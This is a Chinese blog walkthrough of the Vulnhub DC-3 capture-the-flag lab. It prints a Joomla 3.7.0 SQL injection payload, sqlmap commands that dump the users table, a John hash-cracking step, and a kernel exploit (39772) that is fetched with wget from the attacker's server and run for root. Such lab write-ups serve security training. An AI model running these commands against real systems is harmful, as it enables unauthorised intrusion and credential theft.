Vulnhub靶场实战———DC3

最新推荐文章于 2024-04-11 10:57:39 发布
最新推荐文章于 2024-04-11 10:57:39 发布
阅读量245 收藏
点赞数
文章标签: 安全 html 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67309561/article/details/130448892
版权

环境下载:

 
        DC and Five86 Series Challenges - DC-3

虚拟机配置:

        这里还需要更改

        完成之后就可以开始了

信息探测,寻找FLAG

        利用nmap进行主机探测,发现目标靶机IP

        进行端口探测,发现80端口开启,并且使用使是Joomla cms ,我们去先浏览器进行登录

       根据提示我们可以知道这一关只有一个FLAG,并且需要我们获得root权限

       这里我们再进行敏感目录扫描一下,发现含有一个登录页面,我们把他打开

       将登录页面打开

工具利用,漏洞扫描

       在这个页面我们使用AWVS进行漏洞扫描

       在这里我们可以发现此网站存在SQL注入,并且使用的Joomla为3.7.0版本,接下来我们去kali中进行漏洞搜索

       我们将SQL注入的txt打开 查看详细信息

       我们可以看到当中有我们可以直接使用的Sqlmap的payload,接下来就进行爆库

payload:
http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)

sqlmap -u "http://192.168.100.12/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --dbs

       接下来进行爆表

sqlmap -u "http://192.168.100.12/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

       接下来进行爆字段

sqlmap -u "http://192.168.100.12/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns --dump

    我们得到

    用户名:admin

    密码:2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

    此密码被加密了,我们可以使用kali中的John解密

创建文件
touch admin.txt   #创建文件
vi admin.txt      #编辑
john admin.txt    #破解

        解密完成,我们得到密码为snoopy,接下来去网站进行登录

        我们成功进入了后台

权限提升

       我们刚才发现了此网站所使用的cms为joomla3.7.0版本,对此我们去metasploit中进行攻击

       我们成功进入(但是为空指针模式,但由于对作者并不影响所以没有进行生成虚拟终端操作)

       我们CD至root目录下,发现操作不行,并且SUID啥的都不行,所以我们考虑进行系统漏洞提权

       我们查看一下靶机的发行版本信息

cat /etc/*release		#查看发行版信息

        接下来查看kali中的漏洞库信息,发现39772.txt的可以使用

searchsploit Ubuntu 16.04

       接下来我们查看exp

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

        写了exp地址,我们打开进行下载

       但是此路径已经发现改变,新的URL为:bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab

     我们将其下载,打开Apache服务,并移动到指定目录下

systemctl start apache2.service
mv 39772.zip /var/www/html

 

       接下来我们回到刚才的DC3 shell界面将其下载下来

wget http://192.168.79.128/39772.zip

      接下来进行解压zip,cd 39772 等操作

unzip 39772.zip			#解压39772.zip
cd 39772				#进入39772
tar -xvf exploit.tar	#解压缩exploit.tar

      我们进入 ebpf_mapfd_doubleput_exploit 运行exp

cd ebpf_mapfd_doubleput_exploit

      运行方法:

./compile.sh
./doubleput

      稍等一两分钟后进入root目录 ,发现FLAG文件,进行查看

完成!成功获取FLAG文件

Digh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
热门推荐
Aluxian_的博客
03-23 1万+
Vulnhub靶机DC3渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:SQL注入:④:文件上传:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载:
Vulnhub靶机:DC-3渗透详细过程
菜鸟学渗透
04-11 802
Vulnhub靶机:DC-3渗透详细过程
vulnhub靶场之DC-3
qq_58091216的博客
01-08 1178
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3379
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
vulnhub-DC3
weixin_55129870的博客
05-15 488
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
Vulnhub-DC-3靶机实战
御七彩虹猫
03-31 1016
Vulnhub-DC-3靶机实战
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
vulnhub靶场实战系列-DC-1实战流程图
05-17
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub】---DC-3靶机
qq_43168364的博客
08-22 541
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-3 靶机(192.168.15.151) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:namp -sn 102.168.15.0/24 或者用netdiscover, 命令: netdiscover -i eth0 -r 192.168.15.0/24 或者用, arp-scan -l 端口扫描 命令: masscan --ra
vulnhubdc3
qq_54030686的博客
06-08 265
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
渗透实战-vulnhub-DC-3
qq_52263650的博客
04-07 298
渗透实战-vulnhub-DC-2
vulnhub通关-3 DC-3(含靶场资源)
Brucye
02-07 927
6.网络设置,要与攻击机kali在同一网段,要么都用NAT模式,要么都用桥接模式(我这里用是是NAT模式)链接:https://pan.baidu.com/s/1tJr7V5ZbYMtfCLeOa40r2Q。建议不要使用https源,https更换源需要处理安全问题较为麻烦,我这里直接使用的http源。注意:doublepu.c执行后会生成doublepu 要再次执行doublepu。这款工具是专门对Joomla框架进行扫描的,需要进行下载。3.接下来选择你想导入的路径,进行导入即可。
vulnhub DC系列 DC-3
m0_64815693的博客
12-29 1832
vulnhub DC系列 DC-3
[Vulnhub] DC-3靶机渗透
weixin_45605352的博客
08-05 302
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-32,312/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 该靶场只有一个flag。 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现只开启了80端口(HTTP服务) 0x02 web渗透 访问80端口,发现是一个 Joomla 搭建的站: 目录扫描,真正有用的目录不多: 从 README.txt 中获得 Jo
vulnhub靶场,DC-3
kukudeshuo的博客
07-11 430
vulnhub靶场,DC-3 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/ 攻击机:kali(192.168.58.130) 靶机:DC-3(192.168.58.146) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.146 使用nmap扫描查看目标靶机端口开放情况 可以看到目标靶机只开放
Vulnhub靶机】DC-3 (内核exp提权)
过期的秋刀鱼
08-06 407
登陆后,就要开始寻找有没有可以getshell的地方,这类的cms肯定是有上传文件的地方,这里可以上传一个一句话木马,用蚁剑进行连接,也可以写一个php,反弹shell到我们的攻击机上,这边,经过寻找发现了有个templates的beez3的目录。Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。利用John工具,对该密码进行爆破拆解,工具详细信息参考。
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值